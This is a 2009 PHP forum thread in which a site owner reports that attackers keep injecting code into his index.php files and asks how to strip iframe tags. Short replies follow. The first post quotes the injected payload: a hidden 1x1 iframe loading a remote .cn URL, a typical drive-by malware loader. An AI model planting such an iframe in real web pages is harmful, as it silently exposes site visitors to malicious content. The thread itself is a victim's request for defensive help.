Need help for fighting against an attack

Discussion in 'PHP' started by manores, Feb 11, 2009.

0
  1. #1
    Hello everyone,

    Some attackers are somehow able to put this piece of code to my index.php's.

    <iframe src="http://litetopfindworld.cn/in.cgi?cocacola48" width=1 height=1 style="visibility: hidden"></iframe>

    I know I should first find out how they did it and remove the security problem and working on it but I could find out how they did it and got stuck.

    So what I'm asking here is, if someone could suggest a piece of php code to check a .php page for <iframe> tags and remove everything in <iframe> tags altogether from the page. I know some basics about php but could not figure this out while also trying to find the security problem in my systems.

    Thanks in advance.
     
    manores, Feb 11, 2009 IP
  2. tihan

    tihan Active Member

    Messages:
    64
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    93
    #2
    Is there a forum etc on your site? then try

    $postdata_from_forum = strip_tags($postdata_from_forum);
     
    tihan, Feb 11, 2009 IP
  3. dprundle

    dprundle Peon

    Messages:
    399
    Likes Received:
    17
    Best Answers:
    0
    Trophy Points:
    0
    #3
    dprundle, Feb 11, 2009 IP
  4. topseobs

    topseobs Greenhorn

    Messages:
    33
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    16
    #4
    but do you want to delete all this comments already posted?
    or some workaround to prevent more comments like that?
     
    topseobs, Feb 11, 2009 IP
  5. SiteTalkZone

    SiteTalkZone Peon

    Messages:
    243
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #5
    SiteTalkZone, Feb 12, 2009 IP